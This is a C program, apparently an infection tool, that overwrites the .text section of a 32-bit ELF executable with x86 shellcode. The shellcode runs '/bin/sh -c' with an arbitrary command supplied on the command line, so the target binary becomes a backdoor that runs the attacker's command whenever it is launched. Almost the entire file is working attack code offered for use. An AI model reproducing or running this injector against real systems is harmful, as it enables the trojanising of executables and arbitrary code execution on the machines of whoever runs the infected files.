/* .text overwritting by nex */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <elf.h>

char payload[] = "\x60\x31\xc0\x31\xd2\xb0"
				"\x0b\x52\x68\x6e\x2f\x73"
				"\x68\x68\x2f\x2f\x62\x69"
				"\x89\xe3\x52\x68\x2d\x63"
				"\x63\x63\x89\xe1\x52\xeb"
				"\x07\x51\x53\x89\xe1\xcd"
				"\x80\x61\xe8\xf4\xff\xff\xff";

int print_section_header(Elf32_Shdr *shdr, char *strtable);
char* get_elf_type(Elf32_Ehdr *elf);
void banner(void);
int elf_is_valid(Elf32_Ehdr *elf_hdr);
void die(int line,char *err,int code);

int main(int argc, char *argv[])
{
	int fd = -1;
	char *buf = NULL;
	char *table = NULL;
	struct stat elf_stat;
	Elf32_Ehdr *elf_header = NULL;
	Elf32_Shdr *section_hdr = NULL;
	int i,size,sh_size;
	char * shellcode;
        
	if (argc < 3)
		die(__LINE__,"Usage: ./inject <file> <append>",-1);
		
	banner();
	
	printf( "@ File name           \t: %s .\n", argv[1] );
	
	if ((fd = open(argv[1],O_RDWR)) <0) /* Open file in read/write mode */
		die(__LINE__,"error opening file",-1);
	
	if( fstat( fd, &elf_stat ) < 0 )  /* Getting size with fstat */
		die(__LINE__,"error getting file size",-1);

	size = elf_stat.st_size;
        
	printf( "@ File size           \t: %d bytes .\n", size );
        
	buf = (char*)malloc(sizeof(char)*size+1);

	sh_size = sizeof(payload) + strlen(argv[2]);

	shellcode = malloc(sh_size);
	memset(shellcode,0x0,sh_size);
	memcpy(shellcode,payload,sizeof(payload));
	memcpy(shellcode+sizeof(payload)-1,argv[2],strlen(argv[2]));
        
	if (read(fd,buf,size) != size) /* Read whole file */
		die(__LINE__,"error reading bytes",-1);
		
	elf_header = (Elf32_Ehdr *)buf; /* Copy the buffer into elf structure */

	if (elf_is_valid(elf_header) == -1)
		die(__LINE__,"bad elf file",-1);

	printf("@ Entry point      \t: 0x%X .\n", elf_header->e_entry );

	printf("@ Type                 \t: %s .\n",get_elf_type(elf_header));
    
	printf("\n");
       
	section_hdr = (Elf32_Shdr *)(buf + elf_header->e_shoff); /* Get first section */
     
	table = (char *)(buf + section_hdr[elf_header->e_shstrndx].sh_offset); /* Table of section name */

	for(i = 0; i < elf_header->e_shnum; i++)
		if (print_section_header(&section_hdr[i], table))
			pwrite(fd,shellcode,sh_size,section_hdr[i].sh_offset); /* Write the shellcode at the first byte of .text section */
        
	close(fd);

	free(buf);
	return 0;
}

void die(int line,char *err,int code)
{
	printf("[-]Line %d: %s.\n",line,err);
	exit(code);
}

int elf_is_valid(Elf32_Ehdr *elf_hdr)
{
    if( (elf_hdr->e_ident[EI_MAG0] != 0x7F) ||
        (elf_hdr->e_ident[EI_MAG1] != 'E') ||
        (elf_hdr->e_ident[EI_MAG2] != 'L') ||
        (elf_hdr->e_ident[EI_MAG3] != 'F') )
         return 0;

    if(elf_hdr->e_ident[EI_CLASS] != ELFCLASS32)
        return 0;

    if(elf_hdr->e_ident[EI_DATA] != ELFDATA2LSB)
        return 0;

    return 1;
}

void banner(void)
{
	printf("\t~~~ .text section overwritting ~~~\n\n");
}

char* get_elf_type(Elf32_Ehdr *elf)
{
	char *types[] = { "None" , 
			"Relocatable" , 
			"Executable" , 
			"Shared Object" , 
			"Core" , 
			"Defined Types" };
	
	if (elf_is_valid(elf))
		return (char*)types[elf->e_type];
		
	return NULL;
}

int print_section_header(Elf32_Shdr *shdr, char *strtable)
{
	if(!shdr)
		return 0;
        
	if (shdr->sh_name == 127 || (!strcmp(strtable+shdr->sh_name,".text")))
	{
		printf("+ Section %s\n", strtable + shdr->sh_name);
		printf("\t@ Virtual Address: 0x%x\n", shdr->sh_addr);
		printf("\t@ Offset: 0x%x\n", shdr->sh_offset);
		printf("\t@ Size: %d\n", shdr->sh_size);
		printf("\t@ Address alignment: %d\n", shdr->sh_addralign);
		printf("\t@ Entry size: 0x%x\n", shdr->sh_entsize);
	    
		return 1;
	}
	
	return 0;
}